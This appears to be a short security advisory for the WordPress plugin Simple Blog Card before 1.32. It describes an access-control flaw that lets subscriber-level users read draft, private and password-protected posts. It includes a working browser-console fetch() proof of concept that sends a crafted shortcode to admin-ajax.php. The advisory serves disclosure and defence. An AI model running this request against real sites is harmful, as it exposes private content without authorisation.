Simple Blog Card < 1.32 - Subscriber+ Arbitrary Post Access

Description The plugin does not ensure that posts to be displayed via a shortcode are public, allowing any authenticated users, such as subscriber, to retrieve arbitrary post title and their content such as draft, private and password protected ones

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[simpleblogcard url=‘?p=53’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); 53 being the ID of a draft/private/password protected post